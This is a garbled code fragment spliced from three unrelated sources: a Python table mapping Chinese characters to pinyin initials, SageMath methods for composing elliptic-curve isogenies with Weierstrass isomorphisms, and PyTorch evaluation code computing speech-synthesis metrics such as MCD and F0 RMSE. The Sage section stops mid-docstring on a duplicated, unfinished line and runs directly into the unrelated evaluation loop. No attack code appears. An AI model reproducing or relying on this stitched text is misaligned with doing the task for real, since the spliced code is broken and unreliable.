,
u'焦' : [u'q', u'j'] ,
u'閩' : [u'm'] ,
u'䀰' : [u'y', u'g'] ,
u'撳' : [u'q'] ,
u'餶' : [u'g'] ,
u'桀' : [u'j'] ,
u'賃' : [u'r', u'l'] ,
u'寍' : [u'n'] ,
u'铓' : [u'm'] ,
u'佚' : [u'y', u'd'] ,
u'揝' : [u'z'] ,
u'顠' : [u'p'] ,
u'坪' : [u'p'] ,
u'语' : [u'y'] ,
u'嫷' : [u't'] ,
u'罺' : [u'c'] ,
u'鏽' : [u'x'] ,
u'亄' : [u'y'] ,
u'砋' : [u'z'] ,
u'螊' : [u'x', u'l'] ,
u'㜕' : [u'l'] ,
u'嚔' : [u't'] ,
u'耛' : [u'c'] ,
u'弥' : [u'm'] ,
u'纤' : [u'q', u'x', u'j'] ,
u'䶮' : [u'y'] ,
u'朵' : [u'd'] ,
u'蚴' : [u'y', u'n'] ,
u'㘿' : [u'n'] ,
u'喾' : [u'k'] ,
u'轅' : [u'y'] ,
u'幏' : [u'j'] ,
u'緎' : [u'y'] ,
u'靕' : [u'z'] ,
u'䳘' : [u'e'] ,
u'晟' : [u's', u'j', u'c'] ,
u'藞' : [u'l'] ,
u'㕩' : [u'z'] ,
u'哨' : [u's'] ,
u'蹯' : [u'f'] ,
u'嵹' : [u'q', u'j'] ,
u'糸' : [u's', u'm'] ,
u'陿' : [u'x', u's'] ,
u'蔈' : [u'p', u'b'] ,
u'䘊' : [u'm'] ,
u'窍' : [u'q'] ,
u'㾏' : [u'j'] ,
u'渚' : [u'z'] ,
u'芝' : [u'z'] ,
u'䞟' : [u'p'] ,
u'瘪' : [u'p', u'b'] ,
u'䬬' : [u'y'] ,
u'澯' : [u'c'] ,
u'鸺' : [u'x'] ,
u'匼' : [u'q', u'a', u'k'] ,
u'瞿' : [u'q', u'j'] ,
u'䣁' : [u'y'] ,
u'筌' : [u'q'] ,
u'僑' : [u'q'] ,
u'荜' : [u'b'] ,
u'䑞' : [u's'] ,
u'磡' : [u'k'] ,
u'汮' : [u'j'] ,
u'胱' : [u'g'] ,
u'瑾' : [u'j'] ,
u'指' : [u'z'] ,
u'鲎' : [u'h'] ,
u'冐' : [u'm'] ,
u'謗' : [u'b'] ,
u'䰙' : [u'y'] ,
u'禠' : [u's'] ,
u'㪢' : [u's'] ,
u'錧' : [u'g'] ,
u'吩' : [u'f'] ,
u'膰' : [u'f'] ,
u'䊲' : [u'c'] ,
u'簹' : [u'd'] ,
u'櫂' : [u'z'] ,
u'葉' : [u'y', u'x', u's'] ,
u'奋' : [u'f'] ,
u'狒' : [u'f'] ,
u'㟔' : [u'h'] ,
u'慛' : [u'c'] ,
u'髢' : [u't', u'd'] ,
u'忤' : [u'w'] ,
u'襫' : [u's'] ,
u'柴' : [u'c', u'z'] ,
u'㣶' : [u'z'] ,
u'酻' : [u'z'] ,
u'剽' : [u'p', u'b'] ,
u'殁' : [u'm', u'w'] ,
u'谄' : [u'c'] ,
u'㪋' : [u'h'] ,
u'弎' : [u's'] ,
u'玑' : [u'j'] ,
u'鐔' : [u'x', u't'] ,
u'䊛' : [u's'] ,
u'朞' : [u'q', u'j'] ,
u'鮡' : [u'z', u't'] ,
u'㘨' : [u'n'] ,
u'檫' : [u'c', u's'] ,
u'輮' : [u'r'] ,
u'常' : [u'c'] ,
u'犻' : [u'b'] ,
u'霾' : [u'm', u'l'] ,
u'晈' : [u'j'] ,
u'髋' : [u'k'] ,
u'嗕' : [u'r'] ,
u'蹘' : [u'l'] ,
u'奢' : [u's'] ,
u'緥' : [u'b'] ,
u'陨' : [u'y'] ,
u'䳯' : [u'c'] ,
u'慲' : [u'm'] ,
u'哿' : [u'k', u'g'] ,
u'渃' : [u'r'] ,
u'覂' : [u'f'] ,
u'㤍' : [u'q'] ,
u'墌' : [u'z'] ,
u'瘓' : [u'h'] ,
u'醒' : [u'x', u'c', u'j'] ,
u'䄝' : [u'c'] ,
u'悜' : [u'c'] ,
u'鸣' : [u'm'] ,
u'椭' : [u't'] ,
u'袬' : [u'g'] ,
u'㠷' : [u'g'] ,
u'家' : [u'j', u'g'] ,
u'邼' : [u'k'] ,
u'䁇' : [u'm'] ,
u'揆' : [u'k'] ,
u'饍' : [u's'] ,
u'桗' : [u'd'] ,
u'诖' : [u'g'] ,
u'㭡' : [u'x'] ,
u'嫠' : [u'l'] ,
u'灧' : [u'y'] ,
u'鏦' : [u'c'] ,
u'䍱' : [u'x'] ,
u'拰' : [u'n'] ,
u'顷' : [u'q', u'k'] ,
u'謀' : [u'm'] ,
u'䠂' : [u'c'] ,
u'沅' : [u'y'] ,
u'錐' : [u'z'] ,
u'倒' : [u'd'] ,
u'璕' : [u'x'] ,
u'䦗' : [u'x'] ,
u'砢' : [u'k', u'l'] ,
u'鲥' : [u's'] ,
u'耲' : [u'h'] ,
u'䔴' : [u'c'] ,
u'禷' : [u'l'] ,
u'㺹' : [u'b'] ,
u'浄' : [u'j'] ,
u'臇' : [u'j'] ,
u'䛉' : [u'm'] ,
u'畔' : [u'p'] ,
u'滙' : [u'h'] ,
u'剦' : [u'y'] ,
u'盩' : [u'c', u'z'] ,
u'䯫' : [u'h', u's'] ,
u'究' : [u'j'] ,
u'黹' : [u'x', u'z'] ,
u'㽸' : [u'c'] ,
u'叻' : [u'l'] ,
u'芆' : [u'c'] ,
u'䞈' : [u'g'] ,
u'紏' : [u't'] ,
u'澘' : [u's'] ,
u'蔟' : [u'c'] ,
u'娡' : [u'z'] ,
u'瞨' : [u'p'] ,
u'戱' : [u'x', u'h'] ,
u'岺' : [u'l'] ,
u'詁' : [u'g'] ,
u'佃' : [u'd', u't'] ,
u'擊' : [u'x', u'j'] ,
u'㧌' : [u'm'] ,
u'鉑' : [u'b'] ,
u'坓' : [u'x'] ,
u'賚' : [u'l'] ,
u'䇜' : [u'l'] ,
u'罣' : [u'g'] ,
u'㱥' : [u'l'] ,
u'铪' : [u'h', u'k', u'j'] ,
u'槬' : [u'h'] ,
u'蝳' : [u'd'] ,
u'䑵' : [u'm'] ,
u'燼' : [u'j'] ,
u'㛾' : [u'x'] ,
u'䔆' : [u'l'] ,
u'憉' : [u'p'] ,
u'鸌' : [u'h'] ,
u'洖' : [u'w'] ,
u'覙' : [u'l'] ,
u'㰠' : [u'k'] ,
u'墣' : [u'p'] ,
u'甦' : [u's'] ,
u'醩' : [u'z'] ,
u'悳' : [u'd'] ,
u'鴶' : [u'j'] ,
u'㞽' : [u'x'] ,
u'汀' : [u't', u'd'] ,
u'忍' : [u'r'] ,
u'瑐' : [u'j'] ,
u'郓' : [u'y'] ,
u'䭚' : [u'c', u'n'] ,
u'柝' : [u't'] ,
u'鱠' : [u'k'] ,
u'㛧' : [u'm'] ,
u'卪' : [u'j'] ,
u'迭' : [u'd'] ,
u'廷' : [u't'] ,
u'韽' : [u'y', u'a'] ,
u'䪄' : [u'h'] ,
u'簋' : [u'g'] ,
u'莊' : [u'z'] ,
u'劔' : [u'j'] ,
u'萛' : [u'j'] ,
u'嬥' : [u't'] ,
u'䦮' : [u'c'] ,
u'挵' : [u'l', u'n'] ,
u'芴' : [u'h', u'w'] ,
u'冾' : [u'x'] ,
u'譅' : [u's'] ,
u'婏' : [u'f'] ,
u'秎' : [u'f'] ,
u'鍕' : [u'r'] ,
u'䣘' : [u't'] ,
u'扟' : [u's'] ,
u'臞' : [u'q'] ,
u'僨' : [u'f'] ,
u'詯' : [u'h'] ,
u'她' : [u't'] ,
u'磸' : [u'd'] ,
u'鉿' : [u'h', u'k', u'j', u'g'] ,
u'脈' : [u'm'] ,
u'䈊' : [u'l'] ,
u'纍' : [u'l'] ,
u'㮏' : [u'n'] ,
u'樚' : [u'l'] ,
u'蚝' : [u'h', u'c'] ,
u'䎟' : [u'e', u'n'] ,
u'爪' : [u'z'] ,
u'殯' : [u'b'] ,
u'騺' : [u'z'] ,
u'圼' : [u'n'] ,
u'玿' : [u's'] ,
u'䳁' : [u'y', u'b'] ,
u'罌' : [u'y'] ,
u'哑' : [u'y', u'e'] ,
u'蝜' : [u'f'] ,
u'䁞' : [u's'] ,
u'糡' : [u'j'] ,
u'㧣' : [u'z'] ,
u'桮' : [u'b'] ,
u'蓱' : [u'p'] ,
u'灾' : [u'z'] ,
u'䶀' : [u't'] ,
u'朇' : [u'p'] ,
u'颎' : [u'j'] ,
u'喐' : [u'y'] ,
u'輗' : [u'n'] ,
u'䠙' : [u'p', u'b'] ,
u'綠' : [u'l'] ,
u'霧' : [u'm', u'w'] ,
u'倩' : [u'q'] ,
u'薰' : [u'x'] ,
u'䚲' : [u's'] ,
u'砹' : [u'a', u'n'] ,
u'滂' : [u'p'] ,
u'聉' : [u'w'] ,
u'嵋' : [u'm'] ,
u'盒' : [u'a', u'h'] ,
u'敛' : [u'l'] ,
u'黢' : [u'q'] ,
u'寤' : [u'w'] ,
u'赫' : [u'h', u's', u'x'] ,
u'乭' : [u's'] ,
u'援' : [u'y'] ,
u'㳶' : [u'g'] ,
u'镻' : [u'd'] ,
u'噽' : [u'p'] ,
u'澁' : [u's'] ,
u'蠄' : [u'q'] ,
u'嬎' : [u'f'] ,
u'瞑' : [u'm'] ,
u'途' : [u't'] ,
u'䚛' : [u'h'] ,
u'挞' : [u't'] ,
u'龡' : [u'c'] ,
u'溫' : [u'w'] ,
u'謮' : [u'z'] ,
u'娸' : [u'q'] ,
u'皻' : [u'z'] ,
u'錾' : [u'z'] ,
u'䧅' : [u'y', u't'] ,
u'扈' : [u'h'] ,
u'黋' : [u'k'] ,
u'㕒' : [u'w'] ,
u'凕' : [u'm'] ,
u'詘' : [u'q', u'c'] ,
u'嵢' : [u'c'] ,
u'秥' : [u'n'] ,
u'鉨' : [u'x', u'n'] ,
u'䣯' : [u't'] ,
u'敲' : [u'q'] ,
u'臵' : [u'g'] ,
u'㑼' : [u'l'] ,
u'僿' : [u's'] ,
u'樃' : [u'l'] ,
u'趂' : [u'c'] ,
u'岌' : [u'j'] ,
u'爓' : [u'y', u'q', u'x'] ,
u'閒' : [u'x', u'j'] ,
u'撜' : [u'c', u'z'] ,
u'騣' : [u'z'] ,
u'㞦' : [u'j'] ,
u'洭' : [u'k'] ,
u'責' : [u'z'] ,
u'㰷' : [u'z'] ,
u'徶' : [u'b'] ,
u'甽' : [u'q', u'z'] ,
u'钼' : [u'm'] ,
u'䑇' : [u'z'] ,
u'柆' : [u'l'] ,
u'鵍' : [u'h'] ,
u'㛐' : [u'x', u's'] ,
u'汗' : [u'h', u'g'] ,
u'迖' : [u'd', u't'] ,
u'廠' : [u'c'] ,
u'瑧' : [u'j'] ,
u'韦' : [u'w'] ,
u'曰' : [u'y'] ,
u'鱷' : [u'e'] ,
u'㧺' : [u't'] ,
u'輀' : [u'e'] ,
u'䰂' : [u'c'] ,
u'梅' : [u'm'] ,
u'霐' : [u'w'] ,
u'吒' : [u'c', u'z'] ,
u'炕' : [u'h', u'k'] ,
u'䶗' : [u'q', u'k'] ,
u'簢' : [u'm'] ,
u'颥' : [u'r'] ,
u'㤤' : [u'y'] ,
u'喧' : [u'x'] ,
u'萲' : [u'y', u'x'] ,
u'綷' : [u'c'] ,
u'㪹' : [u'l'] ,
u'楄' : [u'p'] ,
u'藇' : [u'y', u'x'] ,
u'䋉' : [u'x', u'k', u'j'] ,
u'煔' : [u'q', u's', u't'] ,
u'乖' : [u'g'] ,
u'櫙' : [u'o'] ,
u'饤' : [u'd'] ,
u'噦' : [u'y', u'h'] ,
u'狩' : [u's'] ,
u'俫' : [u'l'] ,
u'繶' : [u'y'] ,
u'髹' : [u'x'] ,
u'㭸' : [u't'] ,
u'埻' : [u'z'] ,
u'蚆' : [u'p'] ,
u'䎈' : [u'y'] ,
u'礏' : [u'j'] ,
u'㘑' : [u'l'] ,
u'殘' : [u'c'] ,
u'脟' : [u'l'] ,
u'帡' : [u'p'] ,
u'玨' : [u'j'] ,
u'昱' : [u'y'] ,
u'鮸' : [u'm'] ,
u'墺' : [u'a', u'y'] ,
u'蹁' : [u'p'] ,
u'䭃' : [u'r'] ,
u'惊' : [u'j', u'l'] ,
u'陑' : [u'e'] ,
u'卓' : [u'z'] ,
u'裚' : [u'j'] ,
u'䗜' : [u'l'] ,
u'筣' : [u'l'] ,
u'㡥' : [u'y'] ,
u'郪' : [u'q', u'c'] ,
u'淬' : [u'c', u'z'] ,
u'荳' : [u'd'] ,
u'䁵' : [u'b'] ,
u'痼' : [u'g'] ,
u'㒃' : [u'e'] ,
u'夆' : [u'p', u'f'] ,
u'綉' : [u'x', u't'] ,
u'舌' : [u's', u'g'] ,
u'焖' : [u'm'] ,
u'閙' : [u'n'] ,
u'䒣' : [u'r']
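# A minimal usage sketch, assuming the truncated rows above populate a dict
# named char2initials (hypothetical name) mapping a hanzi character to its
# candidate pinyin initials:
#
#   char2initials = { u'焦' : [u'q', u'j'], u'閩' : [u'm'] }  # excerpt
#   def matches_initial(char, letter):
#       return letter in char2initials.get(char, [])
#   assert matches_initial(u'焦', u'j')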
0)
"""
from sage.misc.superseded import deprecation
deprecation(32388, 'Elliptic-curve isogenies will be immutable in a future release of Sage.'
' Use phi*psi instead of phi.set_pre_isomorphism(psi) to obtain the composite isogeny.')
return self._set_pre_isomorphism(preWI)
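# The supported, non-deprecated spelling composes morphisms with ``*``.
# A minimal sketch (curves borrowed from the TESTS below; ``isom`` must be a
# WeierstrassIsomorphism whose codomain equals ``phi``'s domain)::
#
#     sage: E = EllipticCurve(GF(31), [1,1,0,1,-1])
#     sage: R.<x> = GF(31)[]
#     sage: phi = EllipticCurveIsogeny(E, x^3 + 9*x^2 + x + 30)
#     sage: isom = E.short_weierstrass_model().isomorphism_to(E)
#     sage: psi = phi * isom    # same effect as phi.set_pre_isomorphism(isom)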
def _set_pre_isomorphism(self, preWI):
"""
Modify this isogeny by pre-composing with a
:class:`sage.schemes.elliptic_curves.weierstrass_morphism.WeierstrassIsomorphism`.
For internal use only.
TESTS:
These tests were copied from :meth:`set_pre_isomorphism`::
sage: E = EllipticCurve(GF(31), [1,1,0,1,-1])
sage: R.<x> = GF(31)[]
sage: f = x^3 + 9*x^2 + x + 30
sage: phi = EllipticCurveIsogeny(E, f)
sage: Epr = E.short_weierstrass_model()
sage: isom = Epr.isomorphism_to(E)
sage: phi._set_pre_isomorphism(isom)
sage: phi.rational_maps()
((-6*x^4 - 3*x^3 + 12*x^2 + 10*x - 1)/(x^3 + x - 12), (3*x^7 + x^6*y - 14*x^6 - 3*x^5 + 5*x^4*y + 7*x^4 + 8*x^3*y - 8*x^3 - 5*x^2*y + 5*x^2 - 14*x*y + 14*x - 6*y - 6)/(x^6 + 2*x^4 + 7*x^3 + x^2 + 7*x - 11))
sage: phi(Epr((0,22)))
(13 : 21 : 1)
sage: phi(Epr((3,7)))
(14 : 17 : 1)
sage: E = EllipticCurve(GF(29), [0,0,0,1,0])
sage: R.<x> = GF(29)[]
sage: f = x^2 + 5
sage: phi = EllipticCurveIsogeny(E, f)
sage: phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 = x^3 + x over Finite Field of size 29 to Elliptic Curve defined by y^2 = x^3 + 20*x over Finite Field of size 29
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: inv_isom = WeierstrassIsomorphism(E, (1,-2,5,10))
sage: Epr = inv_isom.codomain()
sage: isom = Epr.isomorphism_to(E)
sage: phi._set_pre_isomorphism(isom)
sage: phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 + 10*x*y + 20*y = x^3 + 27*x^2 + 6 over Finite Field of size 29 to Elliptic Curve defined by y^2 = x^3 + 20*x over Finite Field of size 29
sage: phi(Epr((12,1)))
(26 : 0 : 1)
sage: phi(Epr((2,9)))
(0 : 0 : 1)
sage: phi(Epr((21,12)))
(3 : 0 : 1)
sage: phi.rational_maps()[0]
(x^5 - 10*x^4 - 6*x^3 - 7*x^2 - x + 3)/(x^4 - 8*x^3 + 5*x^2 - 14*x - 6)
sage: E = EllipticCurve('11a1')
sage: R.<x> = QQ[]
sage: f = x^2 - 21*x + 80
sage: phi = EllipticCurveIsogeny(E, f); phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 + y = x^3 - x^2 - 10*x - 20 over Rational Field to Elliptic Curve defined by y^2 + y = x^3 - x^2 - 7820*x - 263580 over Rational Field
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: Epr = E.short_weierstrass_model()
sage: isom = Epr.isomorphism_to(E)
sage: phi._set_pre_isomorphism(isom)
sage: phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 = x^3 - 13392*x - 1080432 over Rational Field to Elliptic Curve defined by y^2 + y = x^3 - x^2 - 7820*x - 263580 over Rational Field
sage: phi(Epr((168,1188)))
(0 : 1 : 0)
"""
if not isinstance(preWI, WeierstrassIsomorphism):
raise ValueError("Invalid parameter: isomorphism must be of type Weierstrass isomorphism.")
WIdom = preWI.domain()
WIcod = preWI.codomain()
if self.__E1 != WIcod:
raise ValueError("Invalid parameter: isomorphism must have codomain curve equal to this isogeny's domain.")
if self.__pre_isomorphism is None:
isom = preWI
else:
isom = self.__pre_isomorphism*preWI
domain = WIdom
self.__clear_cached_values()
self.__set_pre_isomorphism(domain, isom)
return
def set_post_isomorphism(self, postWI):
r"""
Modify this isogeny by postcomposing with a Weierstrass isomorphism.
.. WARNING::
Isogenies will be immutable in a future release of Sage.
This method is deprecated in favor of using the ``*`` operator
to compose elliptic-curve morphisms.
EXAMPLES::
sage: E = EllipticCurve(j=GF(31)(0))
sage: R.<x> = GF(31)[]
sage: phi = EllipticCurveIsogeny(E, x+18)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: phi.set_post_isomorphism(WeierstrassIsomorphism(phi.codomain(), (6,8,10,12)))
...
sage: phi
Isogeny of degree 3 from Elliptic Curve defined by y^2 = x^3 + 1 over Finite Field of size 31 to Elliptic Curve defined by y^2 + 24*x*y + 7*y = x^3 + 22*x^2 + 16*x + 20 over Finite Field of size 31
sage: E = EllipticCurve(j=GF(47)(0))
sage: f = E.torsion_polynomial(3)/3
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: post_isom = E2.isomorphism_to(E)
sage: phi.set_post_isomorphism(post_isom)
...
sage: phi.rational_maps() == E.multiplication_by_m(3)
False
sage: phi.switch_sign()
...
sage: phi.rational_maps() == E.multiplication_by_m(3)
True
Example over a number field::
sage: R.<x> = QQ[]
sage: K.<a> = NumberField(x^2 + 2)
sage: E = EllipticCurve(j=K(1728))
sage: ker_list = E.torsion_points()
sage: phi = EllipticCurveIsogeny(E, ker_list)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: post_isom = WeierstrassIsomorphism(phi.codomain(), (a,2,3,5))
sage: phi
Isogeny of degree 4 from Elliptic Curve defined by y^2 = x^3 + x over Number Field in a with defining polynomial x^2 + 2 to Elliptic Curve defined by y^2 = x^3 + (-44)*x + 112 over Number Field in a with defining polynomial x^2 + 2
"""
from sage.misc.superseded import deprecation
deprecation(32388, 'Elliptic-curve isogenies will be immutable in a future release of Sage.'
' Use psi*phi instead of phi.set_post_isomorphism(psi) to obtain the composite isogeny.')
return self._set_post_isomorphism(postWI)
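# Non-deprecated spelling: post-compose with ``*`` (data borrowed from the
# EXAMPLES above; ``w`` must be a WeierstrassIsomorphism starting at
# ``phi``'s codomain)::
#
#     sage: E = EllipticCurve(j=GF(31)(0))
#     sage: R.<x> = GF(31)[]
#     sage: phi = EllipticCurveIsogeny(E, x+18)
#     sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
#     sage: w = WeierstrassIsomorphism(phi.codomain(), (6,8,10,12))
#     sage: psi = w * phi    # same effect as phi.set_post_isomorphism(w)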
def _set_post_isomorphism(self, postWI):
"""
Modify this isogeny by post-composing with a
:class:`sage.schemes.elliptic_curves.weierstrass_morphism.WeierstrassIsomorphism`.
For internal use only.
TESTS:
These tests were copied from :meth:`set_post_isomorphism`::
sage: E = EllipticCurve(j=GF(31)(0))
sage: R.<x> = GF(31)[]
sage: phi = EllipticCurveIsogeny(E, x+18)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: phi._set_post_isomorphism(WeierstrassIsomorphism(phi.codomain(), (6,8,10,12)))
sage: phi
Isogeny of degree 3 from Elliptic Curve defined by y^2 = x^3 + 1 over Finite Field of size 31 to Elliptic Curve defined by y^2 + 24*x*y + 7*y = x^3 + 22*x^2 + 16*x + 20 over Finite Field of size 31
sage: E = EllipticCurve(j=GF(47)(0))
sage: f = E.torsion_polynomial(3)/3
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: post_isom = E2.isomorphism_to(E)
sage: phi._set_post_isomorphism(post_isom)
sage: phi.rational_maps() == E.multiplication_by_m(3)
False
sage: phi = -phi
sage: phi.rational_maps() == E.multiplication_by_m(3)
True
sage: R.<x> = QQ[]
sage: K.<a> = NumberField(x^2 + 2)
sage: E = EllipticCurve(j=K(1728))
sage: ker_list = E.torsion_points()
sage: phi = EllipticCurveIsogeny(E, ker_list)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: post_isom = WeierstrassIsomorphism(phi.codomain(), (a,2,3,5))
sage: phi
Isogeny of degree 4 from Elliptic Curve defined by y^2 = x^3 + x over Number Field in a with defining polynomial x^2 + 2 to Elliptic Curve defined by y^2 = x^3 + (-44)*x + 112 over Number Field in a with defining polynomial x^2 + 2
"""
if not isinstance(postWI, WeierstrassIsomorphism):
raise ValueError("Invalid parameter: isomorphism must be of type Weierstrass isomorphism.")
WIdom = postWI.domain()
WIcod = postWI.codomain()
if self.__E2 != WIdom:
raise ValueError("Invalid parameter: isomorphism must have domain curve equal to this isogeny's codomain.")
if self.__post_isomorphism is None:
isom = postWI
else:
isom = postWI*self.__post_isomorphism
codomain = WIcod
self.__clear_cached_values()
self.__set_post_isomorphism(codomain, isom)
return
def get_pre_isomorphism(self):
r"""
Return the pre-isomorphism of this isogeny, or ``None``.
EXAMPLES::
sage: E = EllipticCurve(GF(31), [1,1,0,1,-1])
sage: R.<x> = GF(31)[]
sage: f = x^3 + 9*x^2 + x + 30
sage: phi = EllipticCurveIsogeny(E, f)
sage: phi.get_post_isomorphism()
sage: Epr = E.short_weierstrass_model()
sage: isom = Epr.isomorphism_to(E)
sage: phi.set_pre_isomorphism(isom)
...
sage: isom == phi.get_pre_isomorphism()
True
sage: E = EllipticCurve(GF(83), [1,0,1,1,0])
sage: R.<x> = GF(83)[]; f = x+24
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: phi2 = EllipticCurveIsogeny(E, None, E2, 2)
sage: phi2.get_pre_isomorphism()
Elliptic-curve morphism:
From: Elliptic Curve defined by y^2 + x*y + y = x^3 + x over Finite Field of size 83
To: Elliptic Curve defined by y^2 = x^3 + 62*x + 74 over Finite Field of size 83
Via: (u,r,s,t) = (1, 76, 41, 3)
"""
return self.__pre_isomorphism
def get_post_isomorphism(self):
r"""
Return the post-isomorphism of this isogeny, or ``None``.
EXAMPLES::
sage: E = EllipticCurve(j=GF(31)(0))
sage: R.<x> = GF(31)[]
sage: phi = EllipticCurveIsogeny(E, x+18)
sage: phi.get_post_isomorphism()
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: isom = WeierstrassIsomorphism(phi.codomain(), (6,8,10,12))
sage: phi.set_post_isomorphism(isom)
...
sage: isom == phi.get_post_isomorphism()
True
sage: E = EllipticCurve(GF(83), [1,0,1,1,0])
sage: R.<x> = GF(83)[]; f = x+24
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: phi2 = EllipticCurveIsogeny(E, None, E2, 2)
sage: phi2.get_post_isomorphism()
Elliptic-curve morphism:
From: Elliptic Curve defined by y^2 = x^3 + 65*x + 69 over Finite Field of size 83
To: Elliptic Curve defined by y^2 = x^3 + 65*x + 69 over Finite Field of size 83
To: Elliptic Curve defined by y^2 + x*y + y = x^3 + 4*x +
curr_ph_b = [[ph[2] for ph in ph_s] for ph_s in ph_b]
#print('len(curr_ph_b): ', len(curr_ph_b))
#print('len(curr_ph_b[0]): ', len(curr_ph_b[0]))
# convert all into variables and transpose (we want time-major)
# TODO: temporarily write lab_b and aco_b to compare to synth
# batches for aco objective eval mismatch
aco_b_npy = aco_b.data.numpy()
lab_b_npy = lab_b.data.numpy()
#np.save('eval_aco_{}.npy'.format(b_idx),
# aco_b_npy)
#np.save('eval_lab_{}.npy'.format(b_idx),
# lab_b_npy)
spk_b = spk_b.transpose(0,1)
spk_name = idx2spk[spk_b.cpu().data[0,0].item()]
lab_b = lab_b.transpose(0,1)
aco_b = aco_b.transpose(0,1)
# get curr batch size
curr_bsz = spk_b.size(1)
# TODO: atm it is NOT stateful
if spk_name not in spk2hid_states:
hid_state = model.init_hidden_state(curr_bsz)
out_state = model.init_output_state(curr_bsz)
spk2hid_states[spk_name] = hid_state
spk2out_states[spk_name] = out_state
#print('Initializing states of spk ', spk_name)
else:
#print('Fetching mulout states of spk ', spk_name)
# select last spks state in the MO dict
hid_state = spk2hid_states[spk_name]
out_state = spk2out_states[spk_name]
hid_state = repackage_hidden(hid_state, curr_bsz)
out_state = repackage_hidden(out_state, curr_bsz)
if cuda:
spk_b = var_to_cuda(spk_b)
lab_b = var_to_cuda(lab_b)
aco_b = var_to_cuda(aco_b)
slen_b = var_to_cuda(slen_b)
hid_state = var_to_cuda(hid_state)
out_state = var_to_cuda(out_state)
# forward through model
y, hid_state, out_state = model(lab_b, hid_state,
out_state,
speaker_idx=spk_b)
spk_npy = spk_b.cpu().data.numpy()
#print(spk_npy)
assert np.all(spk_npy == spk_npy[0, 0]), spk_npy
if isinstance(y, dict):
# we have a MO model, pick the right spk
# print('Extracting y prediction for MO spk ', spk_name)
y = y[spk_name]
# save its states
spk2hid_states[spk_name] = hid_state
spk2out_states[spk_name] = out_state
if reset_batch_state:
# reset RNN states after predicting a batch
del spk2hid_states[spk_name]
del spk2out_states[spk_name]
#print('y size: ', y.size())
#print('aco_b size: ', aco_b.size())
#print('len(curr_ph_b)= ', len(curr_ph_b))
preds, gtruths, \
spks, sil_mask = predict_masked_mcd(y, aco_b, slen_b,
spk_b, curr_ph_b,
preds, gtruths,
spks, sil_mask,
sil_id)
print('After batch preds shape: ', preds.shape)
print('After batch gtruths shape: ', gtruths.shape)
print('After batch sil_mask shape: ', sil_mask.shape)
print('After batch spks shape: ', spks.shape)
print('Sil mask mean: ', sil_mask.mean())
# denorm with normalization stats
assert spk2acostats is not None
preds, gtruths = denorm_aco_preds_gtruth(preds, gtruths,
spks, spk2acostats)
aco_mcd = mcd(preds[:,:40], gtruths[:,:40], spks, idx2spk)
print('U/V preds min: ', preds[:, -1].min())
print('U/V preds max: ', preds[:, -1].max())
print('U/V preds mean: ', preds[:, -1].mean())
print('U/V gtruth min: ', gtruths[:, -1].min())
print('U/V gtruth max: ', gtruths[:, -1].max())
print('U/V gtruth mean: ', gtruths[:, -1].mean())
#print('preds shape: ', preds.shape)
#print('gtruths shape: ', gtruths.shape)
aco_afpr = afpr(np.round(preds[:,-1]).reshape(-1, 1),
gtruths[:,-1].reshape(-1, 1), spks,
idx2spk)
aco_f0_rmse, aco_f0_spk = rmse(np.exp(preds[:, -2]),
np.exp(gtruths[:, -2]),
spks, idx2spk)
#print('Evaluated aco F0 mRMSE [Hz]: {:.2f}'.format(aco_f0_rmse))
masked_f0_preds = np.exp(preds[:, -2]).reshape(-1, 1) * sil_mask
masked_f0_gtruths = np.exp(gtruths[:, -2]).reshape(-1, 1) * sil_mask
write_histogram_log(np.exp(preds[:, -2]),
'F0 predictions',
epoch_idx, log_writer)
write_histogram_log(np.exp(gtruths[:, -2]),
'F0 groundtruth',
epoch_idx, log_writer)
nosil_aco_f0_rmse, \
nosil_aco_f0_spk = rmse(masked_f0_preds,
masked_f0_gtruths,
spks, idx2spk)
write_histogram_log(preds[:, :40],
'MFCC predictions',
epoch_idx, log_writer)
write_histogram_log(gtruths[:, :40],
'MFCC groundtruth',
epoch_idx, log_writer)
masked_cc_preds = preds[:, :40] * sil_mask
masked_cc_gtruths = gtruths[:, :40] * sil_mask
nosil_aco_mcd = mcd(masked_cc_preds, masked_cc_gtruths,
spks, idx2spk)
write_histogram_log(preds[:, -1],
'U/V predictions',
epoch_idx, log_writer)
write_histogram_log(gtruths[:, -1],
'U/V groundtruth',
epoch_idx, log_writer)
masked_uv_preds = np.round(preds[:, -1]).reshape(-1, 1) * sil_mask
masked_uv_gtruths = gtruths[:, -1].reshape(-1, 1) * sil_mask
write_histogram_log(preds[:, -3],
'FV predictions',
epoch_idx, log_writer)
write_histogram_log(gtruths[:, -3],
'FV groundtruth',
epoch_idx, log_writer)
#print('masked_uv_preds shape: ', masked_uv_preds.shape)
#print('masked_uv_gtruths shape: ', masked_uv_gtruths.shape)
nosil_aco_afpr = afpr(masked_uv_preds, masked_uv_gtruths,
spks, idx2spk)
#print('Evaluated aco MCD [dB]: {:.3f}'.format(aco_mcd['total']))
print('========= F0 RMSE =========')
print('Evaluated aco W/O sil phones ({}) F0 mRMSE [Hz]:'
'{:.2f}'.format(sil_id, nosil_aco_f0_rmse))
write_scalar_log(nosil_aco_f0_rmse,
'total_no-silence_F0_rmse_Hz',
epoch_idx, log_writer)
print('Evaluated aco F0 mRMSE of spks: '
'{}'.format(json.dumps(nosil_aco_f0_spk,
indent=2)))
if len(nosil_aco_f0_spk) > 1:
for k, v in nosil_aco_f0_spk.items():
write_scalar_log(v, '{}_no-silence_F0_rmse_Hz'.format(k),
epoch_idx, log_writer)
